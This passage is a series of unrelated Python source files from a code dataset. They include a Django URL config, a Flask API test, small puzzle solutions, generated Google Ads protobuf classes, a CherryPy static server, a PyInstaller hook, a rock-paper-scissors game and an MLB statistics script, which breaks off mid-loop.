path('overviewmap_residence', views.overviewmap_residence, name='residence'),\n path('overviewmap_popularlocations', views.overviewmap_popularlocations, name='overviewmap_popularlocations'),\n path('historicalbackground', views.historicalbackground, name=\"historicalbackground\"),\n path('usingthesite', views.usingthesite, name=\"usingthesite\"),\n path('bibliography', views.bibliography, name=\"bibliography\"),\n path('credits', views.credits, name=\"credits\"),\n path('mapgallery', views.mapgallery, name=\"mapgallery\"),\n path('contact', views.contact, name=\"contact\"),\n path('contactSuccess', views.contactSuccess, name=\"contactSuccess\"),\n path('admin/add_a_storymap',views.SMimport, name=\"StoryMapImporter\"),\n path('admin/XML_to_HTML',views.new_xml_import, name=\"XMLImporter\"),\n re_path(r'^person/(?P\\S+)/', views.person_detail, name=\"person_detail\"),\n re_path(r'^place/(?P\\S+)/', views.place_detail, name=\"place_detail\"),\n re_path(r'^org/(?P\\S+)/', views.org_detail, name=\"org_detail\"),\n re_path(r'^something/(?P\\S+)', views.jsoninfo, name=\"testinfo2\"),\n re_path(r'^manuscriptinfo/(?P\\S+)/', views.pagejsoninfo, name=\"pagejsoninfo\"),\n re_path(r'^outputPagePT/(?P\\S+)/', views.outputPagePT, name=\"outputPagePT\"),\n re_path(r'^outputManuPT/(?P\\S+)/', views.outputManuPT, name=\"outputManuPT\"),\n re_path(r'^outputPagePDF/(?P\\S+)/', views.outputPagePDF, name=\"outputPagePDF\"),\n path('outputAll', views.outputAll, name=\"outputAll\"),\n path('search/',include('haystack.urls')), \n path('transcribe', views.transcribe, name=\"Transcribe\"),\n path('transcribepage/', views.transcribe_info, name=\"transcribepage\"),\n path('admin/review_transcriptions/',staff_member_required(views.ReviewTranscriptionList.as_view()),name='admin_review_transcription_lists'),\n path('admin/review_transcriptions//', views.review_transcription,name='admin_review_transcriptions'),\n path('review_transcriptions', views.testing, name=\"testing\"),\n path('inText_search', views.inText_search, name='searchInText'),\n]\n\n\nadmin.site.site_header = 'Beyond Penns Treaty'\nadmin.site.index_title = 'Beyond Penns Treaty Administration'\n","sub_path":"QI/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"423260271","text":"from shopdb.api import *\nimport shopdb.exceptions as exc\nfrom tests.base_api import BaseAPITestCase\nfrom flask import json\n\n\nclass ListReplenishmentCollectionsAPITestCase(BaseAPITestCase):\n\n def test_list_replenishment_collections_as_admin(self):\n \"\"\"Getting a list of all ReplenishmentCollections as admin\"\"\"\n self.insert_default_replenishmentcollections()\n res = self.get(url='/replenishmentcollections', role='admin')\n self.assertEqual(res.status_code, 200)\n data = json.loads(res.data)\n assert 'replenishmentcollections' in data\n replcolls = data['replenishmentcollections']\n required = ['id', 'timestamp', 'admin_id', 'price', 'revoked',\n 'comment']\n for replcoll in replcolls:\n assert all(x in replcoll for x in required)\n\n def test_list_replenishment_collections_as_user(self):\n \"\"\"Trying to get a list of all ReplenishmentCollections as user\"\"\"\n res = self.get(url='/replenishmentcollections', role='user')\n self.assertEqual(res.status_code, 401)\n self.assertException(res, exc.UnauthorizedAccess)\n","sub_path":"tests/test_api_list_replenishmentcollections.py","file_name":"test_api_list_replenishmentcollections.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"94239063","text":"def solution(record):\n result={}\n ans=[]\n cnt=0\n for i in record:\n s=i.split()\n if s[0]==\"Enter\":\n result[s[1]] = s[2]\n elif s[0]==\"Change\":\n result[s[1]] = s[2]\n\n for i in record:\n s=i.split()\n if s[0]==\"Enter\":\n ans.append(result[s[1]]+\"님이 들어왔습니다.\")\n elif s[0]==\"Leave\":\n ans.append(result[s[1]]+\"님이 나갔습니다.\")\n\n return ans\n\nsolution([\"Enter uid1234 Muzi\", \"Enter uid4567 Prodo\",\"Leave uid1234\",\"Enter uid1234 Prodo\",\"Change uid4567 Ryan\"])","sub_path":"오픈채팅방.py","file_name":"오픈채팅방.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"47443939","text":"# -*- coding: utf-8 -*-\n# Copyright 2023 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom __future__ import annotations\n\n\nimport proto # type: ignore\n\nfrom google.ads.googleads.v14.common.types import asset_policy\nfrom google.ads.googleads.v14.enums.types import (\n asset_performance_label as gage_asset_performance_label,\n)\nfrom google.ads.googleads.v14.enums.types import served_asset_field_type\n\n\n__protobuf__ = proto.module(\n package=\"google.ads.googleads.v14.common\",\n marshal=\"google.ads.googleads.v14\",\n manifest={\n \"AdTextAsset\",\n \"AdImageAsset\",\n \"AdVideoAsset\",\n \"AdMediaBundleAsset\",\n \"AdDiscoveryCarouselCardAsset\",\n \"AdCallToActionAsset\",\n },\n)\n\n\nclass AdTextAsset(proto.Message):\n r\"\"\"A text asset used inside an ad.\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n text (str):\n Asset text.\n\n This field is a member of `oneof`_ ``_text``.\n pinned_field (google.ads.googleads.v14.enums.types.ServedAssetFieldTypeEnum.ServedAssetFieldType):\n The pinned field of the asset. This restricts\n the asset to only serve within this field.\n Multiple assets can be pinned to the same field.\n An asset that is unpinned or pinned to a\n different field will not serve in a field where\n some other asset has been pinned.\n asset_performance_label (google.ads.googleads.v14.enums.types.AssetPerformanceLabelEnum.AssetPerformanceLabel):\n The performance label of this text asset.\n policy_summary_info (google.ads.googleads.v14.common.types.AdAssetPolicySummary):\n The policy summary of this text asset.\n \"\"\"\n\n text: str = proto.Field(\n proto.STRING,\n number=4,\n optional=True,\n )\n pinned_field: served_asset_field_type.ServedAssetFieldTypeEnum.ServedAssetFieldType = proto.Field(\n proto.ENUM,\n number=2,\n enum=served_asset_field_type.ServedAssetFieldTypeEnum.ServedAssetFieldType,\n )\n asset_performance_label: gage_asset_performance_label.AssetPerformanceLabelEnum.AssetPerformanceLabel = proto.Field(\n proto.ENUM,\n number=5,\n enum=gage_asset_performance_label.AssetPerformanceLabelEnum.AssetPerformanceLabel,\n )\n policy_summary_info: asset_policy.AdAssetPolicySummary = proto.Field(\n proto.MESSAGE,\n number=6,\n message=asset_policy.AdAssetPolicySummary,\n )\n\n\nclass AdImageAsset(proto.Message):\n r\"\"\"An image asset used inside an ad.\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n asset (str):\n The Asset resource name of this image.\n\n This field is a member of `oneof`_ ``_asset``.\n \"\"\"\n\n asset: str = proto.Field(\n proto.STRING,\n number=2,\n optional=True,\n )\n\n\nclass AdVideoAsset(proto.Message):\n r\"\"\"A video asset used inside an ad.\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n asset (str):\n The Asset resource name of this video.\n\n This field is a member of `oneof`_ ``_asset``.\n \"\"\"\n\n asset: str = proto.Field(\n proto.STRING,\n number=2,\n optional=True,\n )\n\n\nclass AdMediaBundleAsset(proto.Message):\n r\"\"\"A media bundle asset used inside an ad.\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n asset (str):\n The Asset resource name of this media bundle.\n\n This field is a member of `oneof`_ ``_asset``.\n \"\"\"\n\n asset: str = proto.Field(\n proto.STRING,\n number=2,\n optional=True,\n )\n\n\nclass AdDiscoveryCarouselCardAsset(proto.Message):\n r\"\"\"A discovery carousel card asset used inside an ad.\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n asset (str):\n The Asset resource name of this discovery\n carousel card.\n\n This field is a member of `oneof`_ ``_asset``.\n \"\"\"\n\n asset: str = proto.Field(\n proto.STRING,\n number=1,\n optional=True,\n )\n\n\nclass AdCallToActionAsset(proto.Message):\n r\"\"\"A call to action asset used inside an ad.\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n asset (str):\n The Asset resource name of this call to\n action asset.\n\n This field is a member of `oneof`_ ``_asset``.\n \"\"\"\n\n asset: str = proto.Field(\n proto.STRING,\n number=1,\n optional=True,\n )\n\n\n__all__ = tuple(sorted(__protobuf__.manifest))\n","sub_path":"google/ads/googleads/v14/common/types/ad_asset.py","file_name":"ad_asset.py","file_ext":"py","file_size_in_byte":5466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"612361246","text":"import cherrypy\nimport os\n\n\nclass Root:\n def __init__(self):\n pass\n\n @cherrypy.expose()\n def old(self):\n return load_html('data-browser.html')\n\n @cherrypy.expose(['index'])\n def new(self):\n html = load_html('data-browser.html')\n html = html.replace('js/demo_old.js', 'js/demo_new.js')\n return html\n\n\ndef load_html(file_name):\n lines = open(os.path.join(MEDIA_DIR, file_name), \"r\").readlines()\n return \"\".join(lines)\n\n\nMEDIA_DIR = os.path.join(os.path.abspath(\".\"))\nQUICKSTART_CONFIG = {\n \"/\": {\n \"tools.staticdir.root\": MEDIA_DIR,\n \"tools.etags.on\": True,\n \"tools.etags.autotags\": True,\n \"tools.gzip.on\": True\n },\n \"/css\": {\n \"tools.staticdir.on\": True,\n \"tools.staticdir.dir\": \"css\"\n },\n \"/js\": {\n \"tools.staticdir.on\": True,\n \"tools.staticdir.dir\": \"js\"\n },\n \"/data\": {\n \"tools.staticdir.on\": True,\n \"tools.staticdir.dir\": \"data\"\n },\n}\n\nif __name__ == \"__main__\":\n cherrypy.config.update({\n \"server.socket_host\": \"0.0.0.0\",\n \"server.socket_port\": 80,\n })\n cherrypy.quickstart(Root(), \"\", config=QUICKSTART_CONFIG)\n\n\n","sub_path":"run_server.py","file_name":"run_server.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"63232024","text":"#-----------------------------------------------------------------------------\n# Copyright (c) 2013, PyInstaller Development Team.\n#\n# Distributed under the terms of the GNU General Public License with exception\n# for distributing bootloader.\n#\n# The full license is in the file COPYING.txt, distributed with this software.\n#-----------------------------------------------------------------------------\n\n\nhiddenimports = [\n \"allcontrols\",\n \"asianhotkey\",\n \"comboboxdroppedheight\",\n \"comparetoreffont\",\n \"leadtrailspaces\",\n \"miscvalues\",\n \"missalignment\",\n \"missingextrastring\",\n \"overlapping\",\n \"repeatedhotkey\",\n \"translation\",\n \"truncation\",\n]\n","sub_path":"pyupdater/vendor/PyInstaller/hooks/hook-pywinauto.tests.py","file_name":"hook-pywinauto.tests.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"631606089","text":"#!/usr/bin/python\nimport Operators as O\n\n\ndef main():\n controler = O.ModelOperator(\"/home/gbaranowski/etc/VWT/model2.ini\")\n controler.register()\n controler.verify()\n controler.summarize()\n controler.run()\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"439841733","text":"import random\r\n\r\ngameList = [\"Rock\", \"Paper\", \"Scissor\"]\r\nuserScore = 0\r\ncomputerScore = 0\r\n\r\nwhile True:\r\n userChoice = input(\"Choose Rock, Paper or Scissors: \")\r\n compChoice = gameList[random.randint(0, 2)]\r\n\r\n if userChoice in [\"r\", \"R\", \"rock\", \"ROCK\", \"Rock\"]:\r\n userChoice = \"Rock\"\r\n elif userChoice in [\"p\", \"P\", \"paper\", \"PAPER\", \"Paper\"]:\r\n userChoice = \"Paper\"\r\n elif userChoice in [\"s\", \"S\", \"scissor\", \"SCISSOR\", \"Scissor\"]:\r\n userChoice = \"Scissor\"\r\n else:\r\n print(\"\\nIncorrect input. Try Again.\")\r\n print(\"================================================================\\n\")\r\n continue\r\n\r\n if userChoice == \"Rock\" and compChoice == \"Scissor\":\r\n result = \" You win!\"\r\n userScore += 1\r\n elif userChoice == \"Paper\" and compChoice == \"Rock\":\r\n result = \" You win!\"\r\n userScore += 1\r\n elif userChoice == \"Scissor\" and compChoice == \"Paper\":\r\n result = \" You win!\"\r\n userScore += 1\r\n elif userChoice == compChoice:\r\n result = \" You're tied. Try Again.\"\r\n else:\r\n result = \" You lose!\"\r\n computerScore += 1\r\n\r\n print(\"\\nYou choose \" + userChoice + \". The computer choose \" + compChoice + \".\" + result)\r\n\r\n print(\"\\nPlayer wins: \" + str(userScore) + \"\\nComputer wins: \" + str(computerScore))\r\n\r\n userTryAgain = input(\"\\nDo you want to try again? (Y|N) \")\r\n if userTryAgain in [\"y\", \"Y\", \"YES\", \"yes\", \"Yes\"]:\r\n print(\"\\n================================================================\\n\")\r\n pass\r\n elif userTryAgain in [\"n\", \"N\", \"NO\", \"no\", \"No\"]:\r\n print(\"\\nThanks for playing\")\r\n print(\"================================================================\\n\")\r\n break\r\n else:\r\n print(\"\\nThanks for playing\")\r\n print(\"================================================================\\n\")\r\n break\r\n","sub_path":"rockPaperScissor.py","file_name":"rockPaperScissor.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"182644466","text":"from collections import Counter\n\nn = int(input())\nnums = list(map(int, input().strip().split()))\n\nnums.sort()\n\nmaxx = nums[-1]-nums[0]\nmax_v = nums[-1]\nmin_v = nums[0]\n\nc = Counter(nums)\n\nif (c[max_v] == n):\n print(maxx, (c[max_v]*(c[max_v]-1))//2)\nelse:\n print(maxx, c[max_v]*c[min_v])\n","sub_path":"Codeforces Rating --1300/459B.py","file_name":"459B.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"26909153","text":"import numpy as np\r\nimport pandas as pd\r\nfrom collections import OrderedDict, defaultdict\r\nfrom mlb_classes1 import Players\r\nfrom open_dict import daily_lineups_pitch, date\r\n\r\n# Need to fix information on traded players (Team, Park, Defensive Data)\r\n\r\ndf = pd.read_csv(\"MLB/game_date_info1.csv\", encoding='latin-1')\r\ndf['date'] = list(map((lambda x:date(x)), df['date']))\r\ndf['Date_Team'] = list(map((lambda x,y:x + ' ' + y), df['date'], df['team_home']))\r\ndf['Date_Team_H'] = list(map((lambda x,y:x + ' ' + y), df['date'], df['team_away']))\r\n\r\n\r\nfrom constant_variables import g_df_away_titles, g_df_away_cols\r\ngame_dataframe_away = Players(data = df, column_names = g_df_away_cols, column_titles = g_df_away_titles)\r\n\r\ngame_dataframe_home = Players(data = df, \r\n column_names = ['Date_Team_H', 'date', 'team_home', 'team_away', 'pitcher_away', 'expected_runs_home', 'actual_runs_home', \r\n 'temp', 'humidity', 'rain', 'league'],\r\n column_titles = ['Date_Team', 'Date', 'Team_Bat', 'Stadium', 'Team_Pitch', 'Expected_Runs', 'Runs', 'Temp', \r\n 'Humidity', 'Rain', 'League'])\r\n\r\n\r\n# Create Instance from Class\r\ngame_frames_away = game_dataframe_away.create_df()\r\ngame_frames_home = game_dataframe_home.create_df()\r\ngame_frames = pd.concat([game_frames_away,game_frames_home])\r\n\r\ngame_dataframe = Players(data = game_frames, \r\n column_names = ['Date_Team', 'Date', 'Team_Bat', 'Stadium', 'Team_Pitch', 'Expected_Runs', 'Runs', 'Temp', \r\n 'Humidity', 'Rain', 'League'],\r\n column_titles = ['Date_Team', 'Date', 'Team_Bat', 'Stadium', 'Team_Pitch', 'Expected_Runs', 'Runs', 'Temp', \r\n 'Humidity', 'Rain', 'League'])\r\n\r\n# Create Dictionary from Data\r\ngame_dic1 = game_dataframe.create_dict('Date_Team')\r\ngame_dict_list = game_dic1[1]\r\ngame_dict_dates = game_dic1[2]\r\n\r\n\r\ndf1 = pd.read_csv(\"MLB/batter_all.csv\", encoding='latin-1')\r\ndf1['mlb_team_long'] = list(map((lambda x:x.upper()), df1['mlb_team_long']))\r\ndiv_9 = ['R_batter_Std', 'SO_batter_Std', 'RBI_batter_Std', 'DP_batter_Std', 'R_RIGHTbatter_Std', \r\n 'TB_RIGHTbatter_Std', 'SO_RIGHTbatter_Std', 'RBI_RIGHTbatter_Std', 'DP_RIGHTbatter_Std', 'R_LEFT_batter_Std', \r\n 'TB_LEFT_batter_Std', 'SO_LEFT_batter_Std', 'RBI_LEFT_batter_Std', 'DP_LEFT_batter_Std']\r\nfor div in div_9:\r\n df1[div] = round(df1[div]/df1['PA_batter_Std'],2)\r\n\r\nplayer_frame = Players(data = df1, \r\n column_names = ['mlb_name', 'mlb_id', 'mlb_pos', 'mlb_team_long', 'TEAM', 'bats', 'LG_batter_Std',\r\n 'PA_batter_Std', 'R_batter_Std', 'SO_batter_Std', 'RBI_batter_Std', 'DP_batter_Std', 'AVG_batter_Std', 'OBP_batter_Std', 'SLG_batter_Std', 'OPS_batter_Std', 'ISO_batter_Std',\r\n 'oppOPS_batter_Std', 'TAv_batter_Std', 'VORP_batter_Std', 'FRAA_batter_Std', \r\n 'BWARP_batter_Std', 'BASES_VS_AB_batter_Std', 'SDTHB_BAT'],\r\n column_titles = ['player_name', 'player_id', 'player_position', 'team', 'team_ini', 'bat_hand', 'league',\r\n 'batter_PA', 'batter_runs', 'batter_SO', 'batter_RBI', 'batter_DP', 'batter_AVG', 'batter_OBP', \r\n 'batter_SLG', 'batter_OPS', 'batter_ISO', 'batter_oppOPS', 'batter_TAv', 'batter_VORP', \r\n 'batter_FRAA', 'batter_BWARP', 'batter_BASES_VS_AB', 'hit_mult'])\r\n\r\nplayer_frame_right = Players(data = df1, \r\n column_names = ['mlb_name', 'mlb_pos', 'mlb_team_long', 'TEAM', 'bats', 'LG_batter_Std',\r\n 'G_RIGHTbatter_Std', 'PA_RIGHTbatter_Std', 'R_RIGHTbatter_Std', 'TB_RIGHTbatter_Std', \r\n 'SO_RIGHTbatter_Std', 'RBI_RIGHTbatter_Std', 'DP_RIGHTbatter_Std', 'FB%_RIGHTbatter_Std', \r\n 'GB%_RIGHTbatter_Std', 'LD%_RIGHTbatter_Std', 'POP%_RIGHTbatter_Std', 'ISO_RIGHTbatter_Std', \r\n 'AVG_RIGHTbatter_Std', 'OBP_RIGHTbatter_Std', 'SLG_RIGHTbatter_Std', 'TAV_RIGHTbatter_Std', \r\n 'BASES_VS_AB_RIGHTbatter_Std', 'SDTHB_BATR'],\r\n column_titles = ['player_name', 'player_position', 'team', 'team_ini', 'bat_hand', 'league',\r\n 'bat_games_R', 'bat_PA_R', 'bat_runs_R', 'bat_TB_R', 'bat_SO_R', 'bat_RBI_R', \r\n 'bat_DP_R', 'bat_FB%_R', 'bat_GB%_R', 'bat_LD%_R', 'bat_POP%_R', 'bat_ISO_R', \r\n 'bat_AVG_R', 'bat_OBP_R', 'bat_SLG_R', 'bat_TAV_R', 'batter_BASES_VS_AB_R', \r\n 'hit_mult_R'])\r\n \r\nplayer_frame_left = Players(data = df1, \r\n column_names = ['mlb_name', 'mlb_pos', 'mlb_team_long', 'TEAM', 'bats', 'LG_batter_Std',\r\n 'G_LEFT_batter_Std', 'PA_LEFT_batter_Std', 'R_LEFT_batter_Std', 'TB_LEFT_batter_Std', \r\n 'SO_LEFT_batter_Std', 'RBI_LEFT_batter_Std', 'DP_LEFT_batter_Std', 'FB%_LEFT_batter_Std', \r\n 'GB%_LEFT_batter_Std', 'LD%_LEFT_batter_Std', 'POP%_LEFT_batter_Std', 'ISO_LEFT_batter_Std', \r\n 'AVG_LEFT_batter_Std', 'OBP_LEFT_batter_Std', 'SLG_LEFT_batter_Std', 'TAV_LEFT_batter_Std', \r\n 'BASES_VS_AB_LEFT_batter_Std', 'SDTHB_BATR'],\r\n column_titles = ['player_name', 'player_position', 'team', 'team_ini', 'bat_hand', 'league',\r\n 'bat_games_L', 'bat_PA_L', 'bat_runs_L', 'bat_TB_L', 'bat_SO_L', 'bat_RBI_L', \r\n 'bat_DP_L', 'bat_FB%_L', 'bat_GB%_L', 'bat_LD%_L', 'bat_POP%_L', 'bat_ISO_L', \r\n 'bat_AVG_L', 'bat_OBP_L', 'bat_SLG_L', 'bat_TAV_L', 'batter_BASES_VS_AB_L', \r\n 'hit_mult_L'])\r\n\r\n\r\n# Create Instance from Class\r\nplayer_frames = player_frame.create_df()\r\nplayer_frames_right = player_frame_right.create_df()\r\nplayer_frames_left =player_frame_left.create_df()\r\n\r\n# Create Dictionary from Data\r\nplayer_dic = player_frame.create_dict('mlb_name')\r\nplayer_dict_tot = player_dic[1]\r\nplayer_dict_stats = player_dic[2]\r\n\r\n# Create Dictionary of batters vs righty pitchers\r\nplayer_dic_right = player_frame_right.create_dict('mlb_name')\r\nplayer_dict_tot_right = player_dic_right[1]\r\nplayer_dict_stats_right = player_dic_right[2]\r\n\r\n# Create Dictionary of batters vs lefty pitchers\r\nplayer_dic_left = player_frame_left.create_dict('mlb_name')\r\nplayer_dict_tot_left = player_dic_left[1]\r\nplayer_dict_stats_left = player_dic_left[2]\r\n\r\ndf2 = pd.read_csv(\"MLB/pitcher_all.csv\", encoding='latin-1')\r\ndf2['SO_Pitching_Std'] = round(df2['SO_Pitching_Std']/df2['PA_Pitching_Std'],2)\r\ndf2['G_Pitching_Std'] = round(df2['IP_Pitching_Std']/df2['G_Pitching_Std'],2)\r\ndf2['G_Pitching_Std'] = 1 - df2['G_Pitching_Std']/9\r\n\r\n\r\npitcher_frame = Players(data = df2, \r\n column_names = ['mlb_name', 'mlb_id', 'mlb_pos', 'mlb_team_long', 'TEAM', 'throws', 'IP_Pitching_Std',\r\n 'PA_Pitching_Std', 'SO_Pitching_Std', 'DRA_Pitching_Std', 'ERA_Pitching_Std',\r\n 'PPF_Pitching_Std', 'VORP_Pitching_Std', 'FIP_Pitching_Std', 'PVORP_Pitching_Std',\r\n 'PWARP_Pitching_Std', 'BASES_VS_AB_Pitching_Std', 'SDTHB_ALL', 'H_Def_Ef', 'HR_Def_Ef', \r\n 'GB%_Def_Ef', 'FB%_Def_Ef', 'LD%_Def_Ef', 'POP%_Def_Ef', 'DP%_Def_Ef'],\r\n column_titles = ['player_name', 'player_id', 'player_position', 'team', 'team_ini', 'pitcher_hand', 'pitcher_IP',\r\n 'pitcher_PA', 'pitcher_SO', 'pitcher_DRA', 'pitcher_ERA', 'pitcher_PPF', 'pitcher_VORP', \r\n 'pitcher_FIP', 'pitcher_PVORP', 'pitcher_PWARP', 'pitcher_BASES_VS_AB', 'pitcher_hit_mult',\r\n 'def_H', 'def_HR', 'def_GB%', 'def_FB%', 'def_LD%', 'def_POP%', 'def_DP%'])\r\n\r\n\r\n# Create Instance from Class\r\npitcher_frames = pitcher_frame.create_df()\r\n\r\n# Create Dictionary from Data\r\npitcher_dic = pitcher_frame.create_dict('mlb_name')\r\npitcher_dict_tot = pitcher_dic[1]\r\npitcher_dict_stats = pitcher_dic[2]\r\n\r\n\r\ncolumn_names_left = ['mlb_name', 'mlb_pos', 'mlb_team_long', 'TEAM', 'bats', 'LG_batter_Std',\r\n 'G_LEFT_batter_Std', 'PA_LEFT_batter_Std', 'R_LEFT_batter_Std', 'TB_LEFT_batter_Std', \r\n 'SO_LEFT_batter_Std', 'RBI_LEFT_batter_Std', 'DP_LEFT_batter_Std', 'FB%_LEFT_batter_Std', \r\n 'GB%_LEFT_batter_Std', 'LD%_LEFT_batter_Std', 'POP%_LEFT_batter_Std', 'ISO_LEFT_batter_Std', \r\n 'AVG_LEFT_batter_Std', 'OBP_LEFT_batter_Std', 'SLG_LEFT_batter_Std', 'TAV_LEFT_batter_Std', \r\n 'BASES_VS_AB_LEFT_batter_Std', 'SDTHB_BATR']\r\n\r\ncolumn_names_right = ['mlb_name', 'mlb_pos', 'mlb_team_long', 'TEAM', 'bats', 'LG_batter_Std',\r\n 'G_RIGHTbatter_Std', 'PA_RIGHTbatter_Std', 'R_RIGHTbatter_Std', 'TB_RIGHTbatter_Std', \r\n 'SO_RIGHTbatter_Std', 'RBI_RIGHTbatter_Std', 'DP_RIGHTbatter_Std', 'FB%_RIGHTbatter_Std', \r\n 'GB%_RIGHTbatter_Std', 'LD%_RIGHTbatter_Std', 'POP%_RIGHTbatter_Std', 'ISO_RIGHTbatter_Std', \r\n 'AVG_RIGHTbatter_Std', 'OBP_RIGHTbatter_Std', 'SLG_RIGHTbatter_Std', 'TAV_RIGHTbatter_Std', \r\n 'BASES_VS_AB_RIGHTbatter_Std', 'SDTHB_BATR']\r\n\r\ncolumn_names_all = ['mlb_name', 'mlb_id', 'mlb_pos', 'mlb_team_long', 'TEAM', 'bats', 'LG_batter_Std',\r\n 'PA_batter_Std', 'R_batter_Std', 'SO_batter_Std', 'RBI_batter_Std', 'DP_batter_Std', 'AVG_batter_Std', 'OBP_batter_Std', 'SLG_batter_Std', 'OPS_batter_Std', 'ISO_batter_Std',\r\n 'oppOPS_batter_Std', 'TAv_batter_Std', 'VORP_batter_Std', 'FRAA_batter_Std', \r\n 'BWARP_batter_Std', 'BASES_VS_AB_batter_Std', 'SDTHB_BAT']\r\n\r\ncolumn_names_new = ['mlb_name', 'mlb_pos', 'mlb_team_long', 'TEAM', 'bats', 'LG_batter', 'G_batter',\r\n 'PA_batter', 'R_batter', 'TB_batter', 'SO_batter', 'RBI_batter', 'DP_batter', 'FB%_batter', 'GB%_batter', 'LD%_batter', 'POP%_batter', 'ISO_batter',\r\n 'AVG_batter', 'OBP_batter', 'SLG_batter', 'TAV_batter', \r\n 'BASES_VS_AB_batter', 'SDTHB_BAT']\r\n\r\ndf1_left_index = [list(df1.columns).index(name) for name in column_names_left] \r\ndf1_right_index = [list(df1.columns).index(name) for name in column_names_right]\r\ndf1_all_index = [list(df1.columns).index(name) for name in column_names_all]\r\n\r\n'''\r\ndf1_left_index = []\r\nfor name in column_names_left:\r\n ind = list(df1.columns).index(name)\r\n df1_left_index.append(ind)\r\n \r\ndf1_right_index = []\r\nfor name in column_names_right:\r\n ind = list(df1.columns).index(name)\r\n df1_right_index.append(ind)\r\n \r\n\r\ndf1_all_index = []\r\nfor name in column_names_all:\r\n ind = list(df1.columns).index(name)\r\n df1_all_index.append(ind)\r\n'''\r\n\r\n# Create Lineups\r\nplayer_lineups = player_frame.create_lineups(df1_all_index, df1_right_index, df1_left_index)\r\nplayer_lineup = player_lineups[0]\r\nplayer_lineup_right = player_lineups[1]\r\nplayer_lineup_left = player_lineups[2]\r\nplayer_lineup_right_alt = player_lineups[3]\r\nplayer_lineup_left_alt = player_lineups[4]\r\n\r\n\r\n#for k,v in player_lineup.items():\r\n #v.columns = column_names_new\r\nfor k,v in player_lineup_right.items():\r\n v.columns = column_names_new\r\nfor k,v in player_lineup_left.items():\r\n v.columns = column_names_new\r\nfor k,v in player_lineup_right_alt.items():\r\n v.columns = column_names_new\r\nfor k,v in player_lineup_left_alt.items():\r\n v.columns = column_names_new\r\n\r\n# Based on if team is in AL or NL(not on stadium) - Interleague games won't be accurate\r\ndef team_mean_batting(player_dic):\r\n team_mean = {}\r\n for team in list(player_dic.keys()):\r\n team_info = {k:v for k,v in zip(list(player_dic[team].keys()[6:]), list(player_dic[team].iloc[:,6:].mean()))} \r\n team_mean[team] = team_info\r\n team_info = {}\r\n return team_mean\r\n\r\n\r\n'''\r\n# Based on if team is in AL or NL(not on stadium) - Interleague games won't be accurate\r\ndef team_mean_batting(player_dic):\r\n team_mean, team_info = {},{}\r\n for team in list(player_dic.keys()):\r\n for k,v in zip(list(player_dic[team].keys()[6:]), list(player_dic[team].iloc[:,6:].mean())):\r\n team_info[k] = v\r\n team_mean[team] = team_info\r\n team_info = {}\r\n return team_mean\r\n'''\r\n \r\nteam_mean = team_mean_batting(player_lineup)\r\n\r\n\r\n'''game_pitcher_stats_dict = {}\r\nfor k,v in game_dict_list.items():\r\n for k1,v1 in v.items():\r\n pitcher = game_dict_list[k]['Opponent_Pitcher']\r\n opponent = game_dict_list[k]['Opponent']\r\n if pitcher in list(pitcher_dict_stats.keys()) and opponent == pitcher_dict_stats[pitcher]['team'].upper():\r\n game_pitcher_stats_dict[k] = {**game_dict_list[k], **pitcher_dict_stats[pitcher]}'''\r\n\r\nfrom constant_variables import LEAGUE\r\ndef get_team_league(team_ini):\r\n for ini, league in LEAGUE.items():\r\n if ini == team_ini:\r\n return league\r\n\r\ngame_pitcher_stats_dict = {}\r\nfor k,v in game_dict_dates.items():\r\n for k1,v1 in v.items():\r\n pitcher = game_dict_dates[k]['Team_Pitch']\r\n opponent = game_dict_dates[k]['Stadium']\r\n if pitcher in list(pitcher_dict_stats.keys()) and opponent == pitcher_dict_stats[pitcher]['team_ini'].upper():\r\n game_pitcher_stats_dict[k] = {**game_dict_dates[k], **pitcher_dict_stats[pitcher]}\r\n\r\n\r\ngame_pitcher_batter_stats_dict, team_means = {},{}\r\nteam_mean_left = team_mean_batting(player_lineup_left)\r\nteam_mean_right = team_mean_batting(player_lineup_right)\r\nteam_mean_left_alt = team_mean_batting(player_lineup_left_alt)\r\nteam_mean_right_alt = team_mean_batting(player_lineup_right_alt)\r\nfor k,v in game_pitcher_stats_dict.items():\r\n for k1,v1 in 